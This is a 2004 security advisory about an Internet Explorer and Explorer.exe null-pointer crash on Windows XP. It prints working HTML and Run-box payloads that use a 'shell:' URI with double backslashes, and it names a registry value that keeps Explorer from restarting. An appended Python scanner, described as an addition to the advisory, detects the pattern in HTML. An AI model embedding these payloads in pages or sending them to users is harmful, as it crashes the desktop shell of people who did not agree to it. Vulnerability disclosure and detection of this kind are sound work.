Internet Explorer Causing Explorer.exe - Null Pointer Crash
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Internet Explorer & Explorer.exe
Vendors: http://www.microsoft.com
Versions: Windows XP Professional & Internet Explorer 6.0.2600.0000.xpclnt_qfe.021108-2107
Patched With: Q330994; Q822925; Q828750; Q824145;
Platforms: Windows XP
Bug: Internet Explorer Causing Explorer.exe - Null Pointer Crash
Risk: Medium - D.O.S
Exploitation: Remote with browser
Date: 19 Mar 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@xxxxxxxx
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bug
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Windows XP is currently the most common operating system in the world.
This product must be as safe as it is common.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
A new function, "shell:", was discovered recently. It allows some new
functions to be run remotely. There is a bug in Explorer.exe when it
accesses a filename that contains a double backslash.
For example, accessing any of the HTML tags below will cause Explorer to
crash.
<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe
Explorer.exe crashes when using "\\".
"\" doesn't crash it and even %5C%5C doesn't crash it.
There is a registry key that is turned on by default. This key
automatically restarts "Explorer.exe". If this key is set to "0",
Explorer.exe will not restart.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoRestartShell"=dword:00000001
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe
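A content-filter check for the three forms described in section 2, as an added example that is not part of the original advisory: it scans HTML for "shell:" values in src/href attributes and marks the ones that contain a literal double backslash. The names ShellUriFinder, scan_html and SAMPLE are assumptions, and SAMPLE is constructed input.

```python
from html.parser import HTMLParser

URL_ATTRS = {"src", "href"}  # attributes used by the advisory's two tags


class ShellUriFinder(HTMLParser):
    """Hypothetical helper: collects shell: URIs from src/href attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag/attribute names and accepts unquoted
        # values, which is how the advisory writes its tags.
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            uri = value.strip()
            if not uri.lower().startswith("shell:"):
                continue
            # A literal double backslash is the form reported to crash
            # Explorer.exe; a single one and %5C%5C are reported as harmless.
            verdict = "crash-pattern" if "\\\\" in uri else "shell-uri"
            self.findings.append((tag, name, uri, verdict))


def scan_html(html):
    """Return (tag, attribute, uri, verdict) for every shell: URI found."""
    finder = ShellUriFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: the advisory's iframe plus the two non-crashing forms.
SAMPLE = r"""
<iframe src=shell:windows\\system32\\calc.exe></iframe>
<a href="shell:windows\system32\calc.exe">single backslash</a>
<a href="shell:windows%5C%5Csystem32%5C%5Ccalc.exe">percent-encoded</a>
<a href="https://example.com/">ordinary link</a>
"""

if __name__ == "__main__":
    for tag, attr, uri, verdict in scan_html(SAMPLE):
        print(f"{verdict:13} <{tag} {attr}={uri}>")
```

Any "shell:" URI in remote content is worth logging; the "crash-pattern" verdict only separates the form this advisory reports as crashing Explorer.exe from the two it reports as not crashing.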
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."